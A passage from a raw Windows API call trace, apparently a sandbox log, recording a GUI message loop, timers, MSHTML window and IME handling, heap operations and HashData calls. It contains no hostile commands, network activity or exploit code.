lpMsg=0x19a3fc) returned 1 [0172.099] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0172.099] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0172.099] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3099091816800) returned 1 [0172.099] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0172.099] NtdllDefWindowProc_W () returned 0x0 [0172.100] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.100] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.100] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.100] KillTimer (hWnd=0x30316, uIDEvent=0x201c) returned 1 [0172.100] QueryPerformanceCounter (in: lpPerformanceCount=0x19a26c | out: lpPerformanceCount=0x19a26c*=3099091918638) returned 1 [0172.100] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3099091923917) returned 1 [0172.100] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3099091932825) returned 1 [0172.100] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3099091941103) returned 1 [0172.100] SetEvent (hEvent=0x668) returned 1 [0172.101] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.101] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.101] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.101] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0172.101] KillTimer (hWnd=0x103e2, uIDEvent=0x1000) returned 1 [0172.101] GetCurrentThreadId () returned 0xb48 [0172.101] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.273] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.273] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.273] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.317] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.317] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.317] KillTimer (hWnd=0x30316, uIDEvent=0x201b) returned 1 [0172.317] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.360] GetAsyncKeyState (vKey=17) returned 0 [0172.360] GetAsyncKeyState (vKey=16) returned 0 [0172.360] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0d0 | out: lpPoint=0x19a0d0) returned 1 [0172.361] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.361] memcpy_s (in: _Destination=0xd977a0, _DestinationSize=0x118, _Source=0x19a118, _SourceSize=0x118 | out: _Destination=0xd977a0) returned 0x0 [0172.361] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6dcd20 [0172.361] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.361] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.361] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.362] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x6d560d07, dwHighDateTime=0x1d7d80b)) [0172.362] GetTickCount () returned 0x1d75af3 [0172.362] IUnknown:AddRef (This=0xd6ab40) returned 0x0 [0172.362] IUnknown:Release (This=0xd6ab40) returned 0x7 [0172.362] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x6d560d07, dwHighDateTime=0x1d7d80b)) [0172.362] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x6d562060, dwHighDateTime=0x1d7d80b)) [0172.362] GetTickCount () returned 0x1d75af3 [0172.362] GetCurrentThreadId () returned 0xb48 [0172.362] malloc (_Size=0x28) returned 0xc5d008 [0172.362] GetCurrentThreadId () returned 0xb48 [0172.362] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.363] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0172.363] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.363] IUnknown:Release (This=0xd98400) returned 0x1 [0172.363] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0172.363] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0172.363] SetTimer (hWnd=0x103e2, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0172.364] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0172.364] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.364] IUnknown:Release (This=0xd98440) returned 0x1 [0172.364] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0172.364] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0172.364] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.364] IUnknown:Release (This=0xd6ab40) returned 0x7 [0172.364] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0172.365] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0172.365] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0172.365] SysStringLen (param_1="btnYes") returned 0x6 [0172.365] GetCurrentThreadId () returned 0xb48 [0172.365] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x6d56956c, dwHighDateTime=0x1d7d80b)) [0172.365] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x6d56956c, dwHighDateTime=0x1d7d80b)) [0172.365] GetTickCount () returned 0x1d75b03 [0172.365] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x6d56956c, dwHighDateTime=0x1d7d80b)) [0172.365] free (_Block=0xc5d008) [0172.365] GetCurrentThreadId () returned 0xb48 [0172.366] GetCurrentThreadId () returned 0xb48 [0172.366] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.366] GetCurrentThreadId () returned 0xb48 [0172.366] GetCurrentThreadId () returned 0xb48 [0172.366] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.366] GetCurrentThreadId () returned 0xb48 [0172.366] GetCurrentThreadId () returned 0xb48 [0172.367] GetCurrentThreadId () returned 0xb48 [0172.367] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.367] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.367] memcpy_s (in: _Destination=0xd978c0, _DestinationSize=0x118, _Source=0xd977a0, _SourceSize=0x118 | out: _Destination=0xd978c0) returned 0x0 [0172.367] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6dce00 [0172.367] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.367] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dce00 | out: hHeap=0x5e0000) returned 1 [0172.367] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcd20 | out: hHeap=0x5e0000) returned 1 [0172.368] GetMessageTime () returned 30889421 [0172.368] GetMessagePos () returned 0x11e01d6 [0172.368] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x104, wParam=0x12, lParam=0x20380001, plResult=0x19a1cc | out: plResult=0x19a1cc) returned 0x1 [0172.368] NtdllDefWindowProc_W () returned 0x0 [0172.368] GetCurrentThreadId () returned 0xb48 [0172.368] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.370] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0172.370] NtdllDefWindowProc_W () returned 0x0 [0172.421] NtdllDefWindowProc_W () returned 0x0 [0172.422] NtdllDefWindowProc_W () returned 0x0 [0172.423] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0172.423] IsIconic (hWnd=0x103e0) returned 0 [0172.423] GetClientRect (in: hWnd=0x103e0, lpRect=0x19a374 | out: lpRect=0x19a374) returned 1 [0172.423] OffsetRect (in: lprc=0xd0c5ac, dx=0, dy=0 | out: lprc=0xd0c5ac) returned 1 [0172.423] CopyRect (in: lprcDst=0xd0c5bc, lprcSrc=0x19a374 | out: lprcDst=0xd0c5bc) returned 1 [0172.423] OffsetRect (in: lprc=0xd0c5bc, dx=0, dy=0 | out: lprc=0xd0c5bc) returned 1 [0172.423] CopyRect (in: lprcDst=0x19a254, lprcSrc=0x19a374 | out: lprcDst=0x19a254) returned 1 [0172.423] IntersectRect (in: lprcDst=0x19a264, lprcSrc1=0x19a254, lprcSrc2=0x19a374 | out: lprcDst=0x19a264) returned 1 [0172.423] EqualRect (lprc1=0x19a264, lprc2=0x19a254) returned 1 [0172.423] CreateRectRgnIndirect (lprect=0x6d72c540) returned 0x16040a78 [0172.423] GetUpdateRgn (hWnd=0x103e2, hRgn=0x16040a78, bErase=0) returned 1 [0172.423] DeleteObject (ho=0x16040a78) returned 1 [0172.423] SetWindowPos (hWnd=0x103e2, hWndInsertAfter=0x0, X=0, Y=0, cx=442, cy=256, uFlags=0x14) returned 1 [0172.423] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0172.424] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x46, wParam=0x0, lParam=0x19a1fc*=66530, plResult=0x19a058 | out: plResult=0x19a058) returned 0x1 [0172.424] NtdllDefWindowProc_W () returned 0x0 [0172.424] GetCurrentThreadId () returned 0xb48 [0172.424] GetCurrentThreadId () returned 0xb48 [0172.426] NtdllDefWindowProc_W () returned 0x0 [0172.427] NtdllDefWindowProc_W () returned 0x0 [0172.428] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0172.428] IUnknown_GetWindow (in: punk=0x0, phwnd=0x19a380 | out: phwnd=0x19a380) returned 0x80004005 [0172.428] NtdllDefWindowProc_W () returned 0x1 [0172.431] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0172.432] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0172.433] GetWindowLongW (hWnd=0x103bc, nIndex=-21) returned 6297072 [0172.433] NtdllDefWindowProc_W () returned 0x0 [0172.434] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0172.434] NtdllDefWindowProc_W () returned 0x0 [0172.434] NtdllDefWindowProc_W () returned 0x0 [0172.435] NtdllDefWindowProc_W () returned 0x0 [0172.435] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0172.435] GetAncestor (hwnd=0x103e2, gaFlags=0x3) returned 0x4031a [0172.435] GetAncestor (hwnd=0x0, gaFlags=0x3) returned 0x0 [0172.435] IsChild (hWndParent=0x103e2, hWnd=0x0) returned 0 [0172.436] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0e0 | out: lpPoint=0x19a0e0) returned 1 [0172.436] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199da0 | out: lpPoint=0x199da0) returned 1 [0172.436] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x199da0 | out: lpPoint=0x199da0) returned 1 [0172.437] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0172.437] GetMessageTime () returned 30889421 [0172.437] GetMessagePos () returned 0x11e01d6 [0172.443] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x199fd4 | out: plResult=0x199fd4) returned 0x1 [0172.443] NtdllDefWindowProc_W () returned 0x0 [0172.444] GetCurrentThreadId () returned 0xb48 [0172.444] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0172.444] GetMessageTime () returned 30889421 [0172.444] GetMessagePos () returned 0x11e01d6 [0172.444] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x199ccc | out: plResult=0x199ccc) returned 0x0 [0172.444] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0172.444] GetMessageTime () returned 30889421 [0172.444] GetMessagePos () returned 0x11e01d6 [0172.445] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.445] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.445] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.445] memcpy_s (in: _Destination=0xd97b00, _DestinationSize=0x118, _Source=0xd979e0, _SourceSize=0x118 | out: _Destination=0xd97b00) returned 0x0 [0172.445] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcda0 [0172.445] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0172.446] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0172.446] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcda0 | out: hHeap=0x5e0000) returned 1 [0172.447] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.447] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.447] memcpy_s (in: _Destination=0xd97c20, _DestinationSize=0x118, _Source=0xd979e0, _SourceSize=0x118 | out: _Destination=0xd97c20) returned 0x0 [0172.447] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dcd00 [0172.447] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.447] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0172.448] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0172.448] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0172.448] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0172.448] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0172.448] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0172.448] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0172.448] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0172.448] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0172.448] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0172.448] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0172.448] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0172.448] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0172.448] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="mousemove") returned 1 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="mouseover") returned 1 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="mousedown") returned 1 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="mouseup") returned 1 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="intrnlDblClick") returned 5 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="propertychange") returned -2 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="focus") returned 8 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="blur") returned 12 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="startComposition") returned -5 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="endComposition") returned 9 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="compositionFull") returned 11 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="char") returned 11 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="composition") returned 11 [0172.449] StrCmpICW (pszStr1="notify", pszStr2="notify") returned 0 [0172.450] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.450] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcd00 | out: hHeap=0x5e0000) returned 1 [0172.451] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103e2, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x19958c | out: plResult=0x19958c) returned 0x0 [0172.451] GetCurrentThreadId () returned 0xb48 [0172.451] GetCurrentThreadId () returned 0xb48 [0172.452] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.452] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.452] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0172.452] GetAncestor (hwnd=0x103e2, gaFlags=0x2) returned 0x103e0 [0172.452] IsIconic (hWnd=0x103e0) returned 0 [0172.452] GetCurrentThreadId () returned 0xb48 [0172.452] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.452] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.452] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.453] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a1a8 | out: lpPoint=0x19a1a8) returned 1 [0172.453] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.453] GetCurrentThreadId () returned 0xb48 [0172.455] GetCurrentThreadId () returned 0xb48 [0172.455] GetFocus () returned 0x0 [0172.455] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19a197) returned 0 [0172.455] GetCurrentThreadId () returned 0xb48 [0172.455] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3099127426245) returned 1 [0172.455] GetCurrentThreadId () returned 0xb48 [0172.455] GetCurrentThreadId () returned 0xb48 [0172.455] GetCurrentThreadId () returned 0xb48 [0172.456] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1d8 | out: lpPerformanceCount=0x19a1d8*=3099127474998) returned 1 [0172.456] QueryPerformanceCounter (in: lpPerformanceCount=0x19a1a8 | out: lpPerformanceCount=0x19a1a8*=3099127482321) returned 1 [0172.456] QueryPerformanceCounter (in: lpPerformanceCount=0x19a12c | out: lpPerformanceCount=0x19a12c*=3099127498179) returned 1 [0172.456] QueryPerformanceCounter (in: lpPerformanceCount=0x19a118 | out: lpPerformanceCount=0x19a118*=3099127504556) returned 1 [0172.456] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0bc | out: lpPerformanceCount=0x19a0bc*=3099127510771) returned 1 [0172.456] QueryPerformanceCounter (in: lpPerformanceCount=0x19a0b4 | out: lpPerformanceCount=0x19a0b4*=3099127529670) returned 1 [0172.456] QueryPerformanceCounter (in: lpPerformanceCount=0x199fd4 | out: lpPerformanceCount=0x199fd4*=3099127542525) returned 1 [0172.457] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.457] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.457] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.457] SetEvent (hEvent=0x304) returned 1 [0172.457] WTSGetActiveConsoleSessionId () returned 0x1 [0172.457] GetCurrentProcessId () returned 0xe14 [0172.457] GetCurrentThreadId () returned 0xb48 [0172.457] SetEvent (hEvent=0x668) returned 1 [0172.459] GetClientRect (in: hWnd=0x103e2, lpRect=0x19a240 | out: lpRect=0x19a240) returned 1 [0172.459] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0172.460] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.484] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.484] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.484] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0172.484] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0172.484] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3099130325675) returned 1 [0172.485] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0172.485] NtdllDefWindowProc_W () returned 0x0 [0172.485] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0172.485] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0172.485] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0172.485] KillTimer (hWnd=0x30316, uIDEvent=0x201e) returned 1 [0172.487] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3099130576095) returned 1 [0172.487] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0172.487] GetFocus () returned 0x0 [0172.487] EnumChildWindows (hWndParent=0x103e2, lpEnumFunc=0x6e0775e0, lParam=0x19a147) returned 0 [0172.487] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.488] GetClientRect (in: hWnd=0x103e2, lpRect=0xcfcd64 | out: lpRect=0xcfcd64) returned 1 [0172.488] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.488] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3099130671400) returned 1 [0172.488] GetDCEx (hWnd=0x103e2, hrgnClip=0x0, flags=0x12) returned 0x51010a85 [0172.488] CreateRectRgnIndirect (lprect=0x199ca0) returned 0x17040a78 [0172.488] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199ce0, cPoints=0x1 | out: lpPoints=0x199ce0) returned 21823995 [0172.488] GetRandomRgn (hdc=0x51010a85, hrgn=0x17040a78, i=4) returned 1 [0172.488] OffsetRgn (hrgn=0x17040a78, x=-507, y=-333) returned 2 [0172.488] MapWindowPoints (in: hWndFrom=0x103e2, hWndTo=0x0, lpPoints=0x199cf0, cPoints=0x1 | out: lpPoints=0x199cf0) returned 21823995 [0172.488] GetRegionData (in: hrgn=0x17040a78, nCount=0x0, lpRgnData=0x0 | out: lpRgnData=0x0) returned 0x30 [0172.488] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c2d8 [0172.488] GetRegionData (in: hrgn=0x17040a78, nCount=0x30, lpRgnData=0x9f6c2d8 | out: lpRgnData=0x9f6c2d8) returned 0x30 [0172.488] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.489] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c2d8 | out: hHeap=0x5e0000) returned 1 [0172.489] DeleteObject (ho=0x17040a78) returned 1 [0172.489] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6c540 [0172.489] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6c540) returned 0x90040a6c [0172.489] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6c540 | out: hHeap=0x5e0000) returned 1 [0172.489] SelectClipRgn (hdc=0x51010a85, hrgn=0x90040a6c) returned 2 [0172.489] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x9f6bf90 [0172.489] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x9f6bf90) returned 0x27040a81 [0172.489] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f6bf90 | out: hHeap=0x5e0000) returned 1 [0172.489] ValidateRgn (hWnd=0x103e2, hRgn=0x27040a81) returned 1 [0172.489] DeleteObject (ho=0x90040a6c) returned 1 [0172.490] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0172.490] GetClientRect (in: hWnd=0x103e2, lpRect=0x199bf8 | out: lpRect=0x199bf8) returned 1 [0172.491] GetSysColor (nIndex=15) returned 0xf0f0f0 [0172.491] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7c) returned 0x68caf8 [0172.491] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83118 [0172.560] HashData (in: pbData=0x9f83118, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0172.560] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0172.560] HashData (in: pbData=0x9f8311c, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0172.560] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83118 | out: hHeap=0x5e0000) returned 1 [0172.560] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83010 [0172.560] HashData (in: pbData=0x9f83010, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0172.560] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0172.560] HashData (in: pbData=0x9f83014, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0172.560] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83010 | out: hHeap=0x5e0000) returned 1 [0172.561] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831c0 [0172.561] HashData (in: pbData=0x9f831c0, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0172.561] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0172.561] HashData (in: pbData=0x9f831c4, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) returned 0x0 [0172.561] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831c0 | out: hHeap=0x5e0000) returned 1 [0172.561] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83010 [0172.561] HashData (in: pbData=0x9f83010, cbData=0x1, pbHash=0x198b70, cbHash=0x2 | out: pbHash=0x198b70) returned 0x0 [0172.561] HashData (in: pbData=0x198b6c, cbData=0x4, pbHash=0x198b78, cbHash=0x2 | out: pbHash=0x198b78) returned 0x0 [0172.561] HashData (in: pbData=0x9f83014, cbData=0xc, pbHash=0x198b74, cbHash=0x2 | out: pbHash=0x198b74) 